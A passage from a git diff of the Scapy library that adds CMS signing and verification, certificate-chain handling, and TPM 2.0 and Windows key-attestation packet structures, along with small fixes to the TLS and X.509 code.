cert.isIssuer(c): + # Final node of the chain ! + # (add the final cert if not self signed) + if c != cert: + curchain += [cert] + return curchain + else: + # Not the final node of the chain ! Recurse. + curchain = _rec_getchain(curchain, subtree) + if curchain: + return curchain + return None + + chain = _rec_getchain([], self.tree) + if chain is not None: + return CertTree(chain) + else: + return None + + def verify(self, cert): + """ + Verify that a certificate is properly signed. + """ + # Check that we can find a chain to this certificate + if not self.getchain(cert): + raise ValueError("Certificate verification failed !") + + def show(self, ret: bool = False): + """ + Return the CertTree as a string certificate tree + """ + + def _rec_show(c, children, lvl=0): + s = "" + # Process the current CA + if c: + if not c.isSelfSigned(): + s += "%s [Not Self Signed]\n" % c.subject_str + else: + s += "%s [Self Signed]\n" % c.subject_str + s = lvl * " " + s + lvl += 1 + # Process all sub-CAs at a lower level + for child, subchildren in children: + s += _rec_show(child, subchildren, lvl=lvl) + return s + + showed = _rec_show(None, self.tree) + if ret: + return showed + else: + print(showed) + + def __repr__(self): + return "" % ( + len(self), + len(self.rootCAs), + ) - untrusted = None - if untrusted_file: - try: - with open(untrusted_file, "rb") as f: - untrusted_certs = f.read() - except Exception: - raise Exception("Could not read from untrusted_file") - untrusted = [Cert(c) for c in split_pem(untrusted_certs)] - return self.verifyChain(anchors, untrusted) +####### +# CMS # +####### - def verifyChainFromCAPath(self, capath, untrusted_file=None): +# RFC3852 + + +class CMS_Engine: + """ + A utility class to perform CMS/PKCS7 operations, as specified by RFC3852. + + :param store: a ROOT CA certificate list to trust. + :param crls: a list of CRLs to include. This is currently not checked. + """ + + def __init__( + self, + store: CertList, + crls: List[X509_CRL] = [], + ): + self.store = store + self.crls = crls + + def sign( + self, + message: Union[bytes, Packet], + eContentType: ASN1_OID, + cert: Cert, + key: PrivKey, + h: Optional[str] = None, + ): """ - Does the same job as .verifyChainFromCAFile() but using the list - of anchors in capath directory. The directory should (only) contain - certificates files in PEM format. As for .verifyChainFromCAFile(), - a list of untrusted certificates can be passed as a file - (concatenation of the certificates in PEM format). + Sign a message using CMS. + + :param message: the inner content to sign. + :param eContentType: the OID of the inner content. + :param cert: the certificate whose key to use use for signing. + :param key: the private key to use for signing. + :param h: the hash to use (default: same as the certificate's signature) + + We currently only support X.509 certificates ! """ - try: - anchors = [] - for cafile in os.listdir(capath): - with open(os.path.join(capath, cafile), "rb") as fd: - anchors.append(Cert(fd.read())) - except Exception: - raise Exception("capath provided is not a valid cert path") + # RFC3852 - 5.4. Message Digest Calculation Process + h = h or _get_cert_sig_hashname(cert) + hash = hashes.Hash(_get_hash(h)) + hash.update(bytes(message)) + hashed_message = hash.finalize() + + # 5.5. Signature Generation Process + signerInfo = CMS_SignerInfo( + version=1, + sid=CMS_IssuerAndSerialNumber( + issuer=cert.tbsCertificate.issuer, + serialNumber=cert.tbsCertificate.serialNumber, + ), + digestAlgorithm=X509_AlgorithmIdentifier( + algorithm=ASN1_OID(h), + parameters=ASN1_NULL(0), + ), + signedAttrs=[ + X509_Attribute( + type=ASN1_OID("contentType"), + values=[ + X509_AttributeValue(value=eContentType), + ], + ), + X509_Attribute( + type=ASN1_OID("messageDigest"), + # "A message-digest attribute MUST have a single attribute value" + values=[ + X509_AttributeValue(value=ASN1_STRING(hashed_message)), + ], + ), + ], + signatureAlgorithm=cert.tbsCertificate.signature, + ) + signerInfo.signature = ASN1_STRING( + key.sign( + bytes( + CMS_SignedAttrsForSignature( + signedAttrs=signerInfo.signedAttrs, + ) + ), + h=h, + ) + ) - untrusted = None - if untrusted_file: - try: - with open(untrusted_file, "rb") as f: - untrusted_certs = f.read() - except Exception: - raise Exception("Could not read from untrusted_file") - untrusted = [Cert(c) for c in split_pem(untrusted_certs)] + # Build a chain of X509_Cert to ship (but skip the ROOT certificate) + certTree = CertTree(cert, self.store) + certificates = [x.x509Cert for x in certTree if not x.isSelfSigned()] + + # Build final structure + return CMS_ContentInfo( + contentType=ASN1_OID("id-signedData"), + content=CMS_SignedData( + version=3 if certificates else 1, + digestAlgorithms=X509_AlgorithmIdentifier( + algorithm=ASN1_OID(h), + parameters=ASN1_NULL(0), + ), + encapContentInfo=CMS_EncapsulatedContentInfo( + eContentType=eContentType, + eContent=message, + ), + certificates=( + [CMS_CertificateChoices(certificate=cert) for cert in certificates] + if certificates + else None + ), + crls=( + [CMS_RevocationInfoChoice(crl=crl) for crl in self.crls] + if self.crls + else None + ), + signerInfos=[ + signerInfo, + ], + ), + ) - return self.verifyChain(anchors, untrusted) + def verify( + self, + contentInfo: CMS_ContentInfo, + eContentType: Optional[ASN1_OID] = None, + ): + """ + Verify a CMS message against the list of trusted certificates, + and return the unpacked message if the verification succeeds. - def __repr__(self): - llen = len(self) - 1 - if llen < 0: - return "" - c = self[0] - s = "__ " - if not c.isSelfSigned(): - s += "%s [Not Self Signed]\n" % c.subject_str - else: - s += "%s [Self Signed]\n" % c.subject_str - idx = 1 - while idx <= llen: - c = self[idx] - s += "%s_ %s" % (" " * idx * 2, c.subject_str) - if idx != llen: - s += "\n" - idx += 1 - return s + :param contentInfo: the ContentInfo whose signature to verify + :param eContentType: if provided, verifies that the content type is valid + """ + if contentInfo.contentType.oidname != "id-signedData": + raise ValueError("ContentInfo isn't signed !") + + signeddata = contentInfo.content + + # Build the certificate chain + certificates = [] + if signeddata.certificates: + certificates = [Cert(x.certificate) for x in signeddata.certificates] + certTree = CertTree(certificates, self.store) + + # Check there's at least one signature + if not signeddata.signerInfos: + raise ValueError("ContentInfo contained no signature !") + + # Check all signatures + for signerInfo in signeddata.signerInfos: + # Find certificate in the chain that did this + cert: Cert = certTree.findCertBySid(signerInfo.sid) + + # Verify certificate signature + certTree.verify(cert) + + # Verify the message hash + if signerInfo.signedAttrs: + # Verify the contentType + try: + contentType = next( + x.values[0].value + for x in signerInfo.signedAttrs + if x.type.oidname == "contentType" + ) + + if contentType != signeddata.encapContentInfo.eContentType: + raise ValueError( + "Inconsistent 'contentType' was detected in packet !" + ) + + if eContentType is not None and eContentType != contentType: + raise ValueError( + "Expected '%s' but got '%s' contentType !" + % ( + eContentType, + contentType, + ) + ) + except StopIteration: + raise ValueError("Missing contentType in signedAttrs !") + + # Verify the messageDigest value + try: + # "A message-digest attribute MUST have a single attribute value" + messageDigest = next( + x.values[0].value + for x in signerInfo.signedAttrs + if x.type.oidname == "messageDigest" + ) + + # Re-calculate hash + h = signerInfo.digestAlgorithm.algorithm.oidname + hash = hashes.Hash(_get_hash(h)) + hash.update(bytes(signeddata.encapContentInfo.eContent)) + hashed_message = hash.finalize() + + if hashed_message != messageDigest: + raise ValueError("Invalid messageDigest value !") + except StopIteration: + raise ValueError("Missing messageDigest in signedAttrs !") + + # Verify the signature + cert.verify( + msg=bytes( + CMS_SignedAttrsForSignature( + signedAttrs=signerInfo.signedAttrs, + ) + ), + sig=signerInfo.signature.val, + ) + else: + cert.verify( + msg=bytes(signeddata.encapContentInfo), + sig=signerInfo.signature.val, + ) + + # Return the content + return signeddata.encapContentInfo.eContent diff --git a/scapy/layers/tls/handshake_sslv2.py b/scapy/layers/tls/handshake_sslv2.py index 1917cdf523e..e4a95cabf8e 100644 --- a/scapy/layers/tls/handshake_sslv2.py +++ b/scapy/layers/tls/handshake_sslv2.py @@ -318,7 +318,7 @@ def post_build(self, pkt, pay): else: self.decryptedkey = key - pubkey = self.tls_session.server_certs[0].pubKey + pubkey = self.tls_session.server_certs[0].pubkey self.encryptedkey = pubkey.encrypt(self.decryptedkey) if self.keyarg == b"" and cs_cls.cipher_alg.type == "block": diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 59049e1e6d3..20325240c65 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -140,7 +140,7 @@ def getfield(self, pkt, m): s = pkt.tls_session if s.tls_version and s.tls_version < 0x0300: if len(s.client_certs) > 0: - sig_len = s.client_certs[0].pubKey.pubkey.key_size // 8 + sig_len = s.client_certs[0].pubkey.pubkey.key_size // 8 else: warning("No client certificate provided. " "We're making a wild guess about the signature size.") diff --git a/scapy/layers/tpm.py b/scapy/layers/tpm.py new file mode 100644 index 00000000000..d51fabb03b7 --- /dev/null +++ b/scapy/layers/tpm.py @@ -0,0 +1,729 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Implementation of structures related to TPM 2.0 and Windows PCP + +(Windows Plateform Crypto Provider) +""" + +from scapy.config import conf +from scapy.packet import Packet +from scapy.fields import ( + BitField, + ByteField, + ConditionalField, + FlagsField, + IntField, + LEIntEnumField, + LEIntField, + LongField, + MultipleTypeField, + PacketField, + PacketLenField, + PacketListField, + ShortEnumField, + ShortField, + StrField, + StrFixedLenField, + StrLenField, +) + + +########################## +# TPM 2 structures # +########################## + +IMPLEMENTATION_PCR = 24 +PCR_SELECT_MAX = (IMPLEMENTATION_PCR + 7) // 8 +MAX_RSA_KEY_BITS = 2048 +MAX_RSA_KEY_BYTES = (MAX_RSA_KEY_BITS + 7) // 8 + +# TPM20.h source + +TPM_ALG = { + 0x0000: "TPM_ALG_ERROR", + 0x0001: "TPM_ALG_RSA", + 0x0004: "TPM_ALG_SHA1", + 0x0005: "TPM_ALG_HMAC", + 0x0006: "TPM_ALG_AES", + 0x0007: "TPM_ALG_MGF1", + 0x0008: "TPM_ALG_KEYEDHASH", + 0x000A: "TPM_ALG_XOR", + 0x000B: "TPM_ALG_SHA256", + 0x000C: "TPM_ALG_SHA384", + 0x000D: "TPM_ALG_SHA512", + 0x0010: "TPM_ALG_NULL", + 0x0012: "TPM_ALG_SM3_256", + 0x0013: "TPM_ALG_SM4", + 0x0014: "TPM_ALG_RSASSA", + 0x0015: "TPM_ALG_RSAES", + 0x0016: "TPM_ALG_RSAPSS", + 0x0017: "TPM_ALG_OAEP", + 0x0018: "TPM_ALG_ECDSA", + 0x0019: "TPM_ALG_ECDH", + 0x001A: "TPM_ALG_ECDAA", + 0x001B: "TPM_ALG_SM2", + 0x001C: "TPM_ALG_ECSCHNORR", + 0x001D: "TPM_ALG_ECMQV", + 0x0020: "TPM_ALG_KDF1_SP800_56a", + 0x0021: "TPM_ALG_KDF2", + 0x0022: "TPM_ALG_KDF1_SP800_108", + 0x0023: "TPM_ALG_ECC", + 0x0025: "TPM_ALG_SYMCIPHER", + 0x0040: "TPM_ALG_CTR", + 0x0041: "TPM_ALG_OFB", + 0x0042: "TPM_ALG_CBC", + 0x0043: "TPM_ALG_CFB", + 0x0044: "TPM_ALG_ECB", +} + +TPM_ST = { + 0x00C4: "TPM_ST_RSP_COMMAND", + 0x8000: "TPM_ST_NULL", + 0x8001: "TPM_ST_NO_SESSIONS", + 0x8002: "TPM_ST_SESSIONS", + 0x8014: "TPM_ST_ATTEST_NV", + 0x8015: "TPM_ST_ATTEST_COMMAND_AUDIT", + 0x8016: "TPM_ST_ATTEST_SESSION_AUDIT", + 0x8017: "TPM_ST_ATTEST_CERTIFY", + 0x8018: "TPM_ST_ATTEST_QUOTE", + 0x8019: "TPM_ST_ATTEST_TIME", + 0x801A: "TPM_ST_ATTEST_CREATION", + 0x8021: "TPM_ST_CREATION", + 0x8022: "TPM_ST_VERIFIED", + 0x8023: "TPM_ST_AUTH_SECRET", + 0x8024: "TPM_ST_HASHCHECK", + 0x8025: "TPM_ST_AUTH_SIGNED", + 0x8029: "TPM_ST_FU_MANIFEST", +} + + +class _Packet(Packet): + def default_payload_class(self, payload): + return conf.padding_layer + + +class TPMS_SCHEME_SIGHASH(_Packet): + fields_desc = [ + ShortEnumField("hashAlg", 0, TPM_ALG), + ] + + +class TPMT_RSA_SCHEME(_Packet): + fields_desc = [ + ShortEnumField("scheme", 0, TPM_ALG), + # TPMU_ASYM_SCHEME + MultipleTypeField( + [ + ( + PacketField( + "parameters", TPMS_SCHEME_SIGHASH(), TPMS_SCHEME_SIGHASH + ), + lambda pkt: pkt.scheme + in [ + 0x0014, # RSASSA + 0x0016, # RSAPSS + 0x001A, # RSAPSS + 0x001B, # SM2 + 0x001C, # ECSCHNORR + ], + ) + ], + StrFixedLenField("parameters", b"", length=0), + ), + ] + + +class TPMT_SYM_DEF_OBJECT(_Packet): + fields_desc = [ + ShortEnumField("algorithm", 0, TPM_ALG), + ConditionalField( + ShortField("keyBits", 0), + lambda pkt: pkt.algorithm != 0x0010, + ), + ConditionalField( + ShortField("mode", 0), + lambda pkt: pkt.algorithm != 0x0010, + ), + ] + + +class TPMS_RSA_PARMS(_Packet): + fields_desc = [ + PacketField("symmetric", TPMT_SYM_DEF_OBJECT(), TPMT_SYM_DEF_OBJECT), + PacketField("scheme", TPMT_RSA_SCHEME(), TPMT_RSA_SCHEME), + ShortField("keyBits", 0), + IntField("exponent", 0), + ] + + +class TPM2B_DIGEST(_Packet): + fields_desc = [ + ShortField("size", 0), + StrLenField("buffer", b"", length_from=lambda pkt: pkt.size), + ] + + +class TPML_DIGEST(_Packet): + fields_desc = [ + IntField("count", 0), + PacketListField("digests", [], TPM2B_DIGEST, count_from=lambda pkt: pkt.count), + ] + + +class TPMS_NULL_PARMS(_Packet): + fields_desc = [ + ShortEnumField("algorithm", 0x0010, TPM_ALG), + ] + + +class TPMT_PUBLIC(_Packet): + fields_desc = [ + ShortEnumField("type", 0x0001, TPM_ALG), + ShortEnumField("nameAlg", 0, TPM_ALG), + FlagsField( + "objectAttributes", + 0, + 32, + [ + "reserved1", + "fixedTPM", + "stClear", + "reserved4", + "fixedParent", + "sensitiveDataOrigin", + "userWithAuth", + "adminWithPolicy", + "reserved8", + "reserved9", + "noDA", + "encryptedDuplication", + "reserved12", + "reserved13", + "reserved14", + "reserved15", + "restricted", + "decrypt", + "sign", + ], + ), + PacketField("authPolicy", TPM2B_DIGEST(), TPM2B_DIGEST), + MultipleTypeField( + [ + # TPMU_PUBLIC_PARMS + ( + PacketField("parameters", TPMS_RSA_PARMS(), TPMS_RSA_PARMS), + lambda pkt: pkt.type == 0x0001, + ) + ], + StrFixedLenField("parameters", b"", length=0), + ), + # TPMU_PUBLIC_ID + PacketField("unique", TPM2B_DIGEST(), TPM2B_DIGEST), + ] + + +class TPM2B_PUBLIC(_Packet): + fields_desc = [ + ShortField("size", 0), + PacketLenField( + "publicArea", + TPMT_PUBLIC(), + TPMT_PUBLIC, + length_from=lambda pkt: pkt.size, + ), + ] + + +class TPM2B_PRIVATE_KEY_RSA(_Packet): + fields_desc = [ + ShortField("size", 0), + StrLenField( + "buffer", + b"", + length_from=lambda pkt: pkt.size, + ), + ] + + +TPM2B_AUTH = TPM2B_DIGEST + + +class TPMT_SENSITIVE(_Packet): + fields_desc = [ + ShortEnumField("sensitiveType", 0, TPM_ALG), + PacketField("authValue", TPM2B_AUTH(), TPM2B_AUTH), + PacketField("seedValue", TPM2B_DIGEST(), TPM2B_DIGEST), + MultipleTypeField( + [ + # TPMU_SENSITIVE_COMPOSITE + ( + PacketField( + "sensitive", TPM2B_PRIVATE_KEY_RSA(), TPM2B_PRIVATE_KEY_RSA + ), + lambda pkt: pkt.sensitiveType == 0x0001, # TPM_ALG_RSA + ), + ], + StrField("sensitive", b""), + ), + ] + + +class TPM2B_SENSITIVE(_Packet): + fields_desc = [ + ShortField("size", 0), + PacketLenField( + "sensitiveArea", + TPMT_SENSITIVE(), + TPMT_SENSITIVE, + length_from=lambda pkt: pkt.size, + ), + ] + + +class _PRIVATE(_Packet): + fields_desc = [ + PacketField("integrityOuter", TPM2B_DIGEST(), TPM2B_DIGEST), + PacketField("integrityInner", TPM2B_DIGEST(), TPM2B_DIGEST), + StrField("sensitive", b""), # Encrypted + ] + + +class TPM2B_PRIVATE(_Packet): + fields_desc = [ + ShortField("size", 0), + PacketLenField( + "buffer", + _PRIVATE(), + _PRIVATE, + length_from=lambda pkt: pkt.size, + ), + ] + + +class TPM2B_NAME(_Packet): + fields_desc = [ + ShortField("size", 0), + StrLenField("Name", b"", length_from=lambda pkt: pkt.size), + ] + + +class TPM2B_DATA(_Packet): + fields_desc = [ + ShortField("size", 0), + StrLenField("buffer", b"", length_from=lambda pkt: pkt.size), + ] + + +class TPMA_LOCALITY(_Packet): + fields_desc = [ + BitField("locZero", 0, 1), + BitField("locOne", 0, 1), + BitField("locTwo", 0, 1), + BitField("locThree", 0, 1), + BitField("locFour", 0, 1), + BitField("Extended", 0, 3), + ] + + +class TPMS_PCR_SELECTION(_Packet): + fields_desc = [ + ShortEnumField("hash", 0, TPM_ALG), + ByteField("sizeOfSelect", 0), + StrFixedLenField("pcrSelect", b"", length=PCR_SELECT_MAX), + ] + + +class TPML_PCR_SELECTION(_Packet): + fields_desc = [ + IntField("count", 0), + PacketListField( + "pcrSelections", [], TPMS_PCR_SELECTION, count_from=lambda pkt: pkt.count + ), + ] + + +class TPMS_CREATION_DATA(_Packet): + fields_desc = [ + PacketField("pcrSelect", TPML_PCR_SELECTION(), TPML_PCR_SELECTION), + PacketField("pcrDigest", TPM2B_DIGEST(), TPM2B_DIGEST), + PacketField("locality", TPMA_LOCALITY(), TPMA_LOCALITY), + ShortEnumField("parentNameAlg", 0, TPM_ALG), + PacketField("parentName", TPM2B_NAME(), TPM2B_NAME), + PacketField("parentQualifiedName", TPM2B_NAME(), TPM2B_NAME), + PacketField("outsideInfo", TPM2B_DATA(), TPM2B_DATA), + ] + + +class TPM2B_CREATION_DATA(_Packet): + fields_desc = [ + ShortField("size", 0), + PacketLenField( + "creationData", + TPMS_CREATION_DATA(), + TPMS_CREATION_DATA, + length_from=lambda pkt: pkt.size, + ), + ] + + +class TPMS_CLOCK_INFO(_Packet): + fields_desc = [ + LongField("clock", 0), # obfuscated + IntField("resetCount", 0), # obfuscated + IntField("restartCount", 0), # obfuscated + ByteField("safe", 0), + ] + + +class TPMS_CREATION_INFO(_Packet): + fields_desc = [ + PacketField("objectName", TPM2B_NAME(), TPM2B_NAME), + PacketField("creationHash", TPM2B_DIGEST(), TPM2B_DIGEST), + ] + + +class TPMS_CERTIFY_INFO(_Packet): + fields_desc = [ + PacketField("Name", TPM2B_NAME(), TPM2B_NAME), + PacketField("qualifiedName", TPM2B_DIGEST(), TPM2B_DIGEST), + ] + + +class TPMS_ATTEST(_Packet): + fields_desc = [ + StrFixedLenField("magic", b"\xffTCG", length=4), + ShortEnumField("type", 0, TPM_ST), + PacketField("qualifiedSigned", TPM2B_NAME(), TPM2B_NAME), + PacketField("extraData", TPM2B_DATA(), TPM2B_DATA), + PacketField("clockInfo", TPMS_CLOCK_INFO(), TPMS_CLOCK_INFO), + LongField("firmwareVersion", 0), + MultipleTypeField( + [ + # TPMU_ATTEST + ( + PacketField("attested", TPMS_CERTIFY_INFO(), TPMS_CERTIFY_INFO), + lambda pkt: pkt.type == 0x8017, # TPM_ST_ATTEST_CERTIFY + ), + ( + PacketField("attested", TPMS_CREATION_INFO(), TPMS_CREATION_INFO), + lambda pkt: pkt.type == 0x801A, # TPM_ST_ATTEST_CREATION + ), + ], + StrField("attested", b""), + ), + ] + + +class TPM2B_ATTEST(_Packet): + fields_desc = [ + ShortField("size", 0), + PacketLenField( + "attestationData", + TPMS_ATTEST(), + TPMS_ATTEST, + length_from=lambda pkt: pkt.size, + ), + ] + + +class TPM2B_PUBLIC_KEY_RSA(_Packet): + fields_desc = [ + ShortField("size", 0), + StrFixedLenField("buffer", b"", length=MAX_RSA_KEY_BYTES), + ] + + +class TPMS_SIGNATURE_RSASSA(_Packet): + fields_desc = [ + ShortEnumField("hash", 0, TPM_ALG), + PacketField("sig", TPM2B_PUBLIC_KEY_RSA(), TPM2B_PUBLIC_KEY_RSA), + ] + + +class TPMS_SIGNATURE_RSAPSS(_Packet): + fields_desc = [ + ShortEnumField("hash", 0, TPM_ALG), + PacketField("sig", TPM2B_PUBLIC_KEY_RSA(), TPM2B_PUBLIC_KEY_RSA), + ] + + +class TPMT_SIGNATURE(_Packet): + fields_desc = [ + ShortEnumField("sigAlg", 0, TPM_ALG), + MultipleTypeField( + [ + # TPMU_SIGNATURE + ( + PacketField( + "signature", TPMS_SIGNATURE_RSASSA(), TPMS_SIGNATURE_RSASSA + ), + lambda pkt: pkt.sigAlg == 0x0014, # RSASSA + ), + ( + PacketField( + "signature", TPMS_SIGNATURE_RSAPSS(), TPMS_SIGNATURE_RSAPSS + ), + lambda pkt: pkt.sigAlg == 0x0016, # RSASSA + ), + ], + StrField("signature", b""), + ), + ] + + +# From "Using the Windows 8 Platform PCP" documentation +# https://github.com/Microsoft/TSS.MSR/blob/main/PCPTool.v11/inc/TpmAtt.h + + +# NCRYPT_PCP_TPM12_IDBINDING +class PCP_IDBinding20(Packet): + fields_desc = [ + PacketField("PublicKey", TPM2B_PUBLIC(), TPM2B_PUBLIC), + PacketField("CreationData", TPM2B_CREATION_DATA(), TPM2B_CREATION_DATA), + PacketField("Attest", TPM2B_ATTEST(), TPM2B_ATTEST), + PacketField("Signature", TPMT_SIGNATURE(), TPMT_SIGNATURE), + ] + + +_PCP_TYPE = { + 1: "TPM 1.2", + 2: "TPM 2.0", +} + + +class PCP_KEY_BLOB(Packet): + fields_desc = [ + StrFixedLenField("Magic", b"PCPM", length=4), + LEIntField("cbHeader", 0), + LEIntEnumField("pcpType", 1, _PCP_TYPE), + FlagsField( + "flags", + 0, + -32, + { + 0x00000001: "authRequired", + 0x00000002: "undocumented2", + }, + ), + LEIntField("cbTpmKey", 0), + StrLenField( + "tpmKey", + b"", + length_from=lambda pkt: pkt.cbTpmKey, + ), + ] + + +class PCP_20_KEY_BLOB(Packet): + fields_desc = [ + StrFixedLenField("Magic", b"PCPM", length=4), + LEIntField("cbHeader", 0), + LEIntEnumField("pcpType", 2, _PCP_TYPE), + FlagsField( + "flags", + 0, + -32, + { + 0x00000001: "authRequired", + 0x00000002: "undocumented2", + }, + ), + LEIntField("cbPublic", 0), + LEIntField("cbPrivate", 0), + LEIntField("cbMigrationPublic", 0), + LEIntField("cbMigrationPrivate", 0), + LEIntField("cbPolicyDigestList", 0), + LEIntField("cbPCRBinding", 0), + LEIntField("cbPCRDigest", 0), + LEIntField("cbEncryptedSecret", 0), + LEIntField("cbTpm12HostageBlob", 0), + LEIntField("pcrAlgId", 0), + PacketLenField( + "public", + TPM2B_PUBLIC(), + TPM2B_PUBLIC, + length_from=lambda pkt: pkt.cbPublic, + ), + PacketLenField( + "private", + TPM2B_PRIVATE(), + TPM2B_PRIVATE, + length_from=lambda pkt: pkt.cbPrivate, + ), + PacketLenField( + "migrationPublic", + None, + TPM2B_PUBLIC, + length_from=lambda pkt: pkt.cbMigrationPublic, + ), + PacketLenField( + "migrationPrivate", + TPM2B_PRIVATE(), + TPM2B_PRIVATE, + length_from=lambda pkt: pkt.cbMigrationPrivate, + ), + PacketLenField( + "policyDigestList", + TPML_DIGEST(), + TPML_DIGEST, + length_from=lambda pkt: pkt.cbPolicyDigestList, + ), + StrLenField( + "pcrBinding", + b"", + length_from=lambda pkt: pkt.cbPCRBinding, + ), + StrLenField( + "pcrDigest", + b"", + length_from=lambda pkt: pkt.cbPCRDigest, + ), + StrLenField( + "encryptedSecret", + b"", + length_from=lambda pkt: pkt.cbEncryptedSecret, + ), + StrLenField( + "tpm12HostageBlob", + b"", + length_from=lambda pkt: pkt.cbTpm12HostageBlob, + ), + ] + + +########################### +# Microsoft Windows # +########################### + +# [MS-WCCE] sect 2.2.2.5 + + +class KeyAttestation(Packet): + fields_desc = [ + StrFixedLenField("Magic", b"KADS", length=4), + LEIntEnumField("Platform", 2, _PCP_TYPE), + LEIntField("HeaderSize", 0), + LEIntField("cbKeyAttest", 0), + LEIntField("cbSignature", 0), + LEIntField("cbKeyBlob", 0), + MultipleTypeField( + [ + ( + PacketLenField( + "keyAttest", + TPMS_ATTEST(), + TPMS_ATTEST, + length_from=lambda pkt: pkt.cbKeyAttest, + ), + lambda pkt: pkt.Platform == 2, + ) + ], + StrLenField( + "keyAttest", + b"", + length_from=lambda pkt: pkt.cbKeyAttest, + ), + ), + StrLenField( + "signature", + b"", + length_from=lambda pkt: pkt.cbSignature, + ), + MultipleTypeField( + [ + ( + PacketLenField( + "keyBlob", + PCP_20_KEY_BLOB(), + PCP_20_KEY_BLOB, + length_from=lambda pkt: pkt.cbKeyBlob, + ), + lambda pkt: pkt.Platform == 2, + ), + ( + PacketLenField( + "keyBlob", + PCP_KEY_BLOB(), + PCP_KEY_BLOB, + length_from=lambda pkt: pkt.cbKeyBlob, + ), + lambda pkt: pkt.Platform == 1, + ), + ], + StrLenField( + "keyBlob", + b"", + length_from=lambda pkt: pkt.cbKeyBlob, + ), + ), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class KeyAttestationStatement(Packet): + fields_desc = [ + StrFixedLenField("Magic", b"KAST", length=4), + LEIntField("Version", 1), + LEIntEnumField("Platform", 2, _PCP_TYPE), + LEIntField("HeaderSize", 0), + LEIntField("cbIdBinding", 0), + LEIntField("cbKeyAttestation", 0), + LEIntField("cbAIKOpaque", 0), + MultipleTypeField( + [ + ( + PacketLenField( + "idBinding", + PCP_IDBinding20(), + PCP_IDBinding20, + length_from=lambda pkt: pkt.cbIdBinding, + ), + lambda pkt: pkt.Platform == 2, + ) + ], + StrLenField( + "idBinding", + b"", + length_from=lambda pkt: pkt.cbIdBinding, + ), + ), + PacketLenField( + "keyAttestation", + KeyAttestation(), + KeyAttestation, + length_from=lambda pkt: pkt.cbKeyAttestation, + ), + MultipleTypeField( + [ + ( + PacketLenField( + "aikOpaque", + PCP_20_KEY_BLOB(), + PCP_20_KEY_BLOB, + length_from=lambda pkt: pkt.cbAIKOpaque, + ), + lambda pkt: pkt.Platform == 2, + ), + ( + PacketLenField( + "aikOpaque", + PCP_KEY_BLOB(), + PCP_KEY_BLOB, + length_from=lambda pkt: pkt.cbAIKOpaque, + ), + lambda pkt: pkt.Platform == 1, + ), + ], + StrLenField( + "aikOpaque", + b"", + length_from=lambda pkt: pkt.cbAIKOpaque, + ), + ), + ] diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 1f1afe4f9c9..6611e9bc590 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -7,14 +7,14 @@ # Cool history about this file: http://natisbad.org/scapy/index.html """ -X.509 certificates and other crypto-related ASN.1 structures +X.509 certificates, OCSP, CRL, CMS and other crypto-related ASN.1 structures """ +from scapy.asn1.ber import BER_Decoding_Error from scapy.asn1.mib import conf # loads conf.mib from scapy.asn1.asn1 import ( ASN1_Codecs, ASN1_IA5_STRING, - ASN1_NULL, ASN1_OID, ASN1_PRINTABLE_STRING, ASN1_UTC_TIME, @@ -37,12 +37,14 @@ ASN1F_ISO646_STRING, ASN1F_NULL, ASN1F_OID, + ASN1F_omit, ASN1F_optional, ASN1F_PACKET, ASN1F_PRINTABLE_STRING, ASN1F_SEQUENCE_OF, ASN1F_SEQUENCE, ASN1F_SET_OF, + ASN1F_STRING_ENCAPS, ASN1F_STRING_PacketField, ASN1F_STRING, ASN1F_T61_STRING, @@ -51,10 +53,15 @@ ASN1F_UTF8_STRING, ) from scapy.packet import Packet -from scapy.fields import PacketField, MultipleTypeField +from scapy.fields import ( + MultipleTypeField, + PacketField, +) from scapy.volatile import ZuluTime, GeneralizedTime from scapy.compat import plain_str +from scapy.layers.tpm import KeyAttestationStatement + class ASN1P_OID(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -218,6 +225,24 @@ class ECDSASignature(ASN1_Packet): ASN1F_INTEGER("s", 0)) +#################################### +# Diffie Hellman Exchange Packets # +#################################### +# based on PKCS#3 + +# PKCS#3 sect 9 + +class DHParameter(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("p", 0), + ASN1F_INTEGER("g", 0), + ASN1F_optional( + ASN1F_INTEGER("l", 0) # aka. 'privateValueLength' + ), + ) + + #################################### # x25519/x448 packets # #################################### @@ -266,12 +291,37 @@ def __init__(self, name, default, **kwargs): **kwargs) +# More details on attributes in PKCS#9 +_X509_ATTRIBUTE_TYPE = {} + + +class _AttributeValue_Field(ASN1F_field): + def m2i(self, pkt, s): + # Some types have special structures + if pkt.underlayer: + attrType = pkt.underlayer.type.val + if attrType in _X509_ATTRIBUTE_TYPE: + return self.extract_packet( + _X509_ATTRIBUTE_TYPE[attrType], + s, + _underlayer=pkt, + ) + try: + return super(_AttributeValue_Field, self).m2i(pkt, s) + except BER_Decoding_Error: + # Do not fail on special attributes + return s, b"" + + def i2m(self, pkt, x): + # The special structures should be just bytes() + if pkt.underlayer and pkt.underlayer.type.val in _X509_ATTRIBUTE_TYPE: + return bytes(x) + return super(_AttributeValue_Field, self).i2m(pkt, x) + + class X509_AttributeValue(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_CHOICE("value", ASN1_PRINTABLE_STRING("FR"), - ASN1F_PRINTABLE_STRING, ASN1F_UTF8_STRING, - ASN1F_IA5_STRING, ASN1F_T61_STRING, - ASN1F_UNIVERSAL_STRING) + ASN1_root = _AttributeValue_Field("value", ASN1_PRINTABLE_STRING("FR")) class X509_Attribute(ASN1_Packet): @@ -771,6 +821,21 @@ class X509_ExtOidNTDSCaSecurity(ASN1_Packet): value = ASN1_UTF8_STRING("") +# [MS-WCCE] sect 2.2.2.7.7.2 + +class X509_ExtCertificateTemplateOID(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("templateID", "0"), + ASN1F_optional( + ASN1F_INTEGER("templateMajorVersion", 0), + ), + ASN1F_optional( + ASN1F_INTEGER("templateMinorVersion", 0), + ), + ) + + # oid-info.com shows that some extensions share multiple OIDs. # Here we only reproduce those written in RFC5280. _ext_mapping = { @@ -799,6 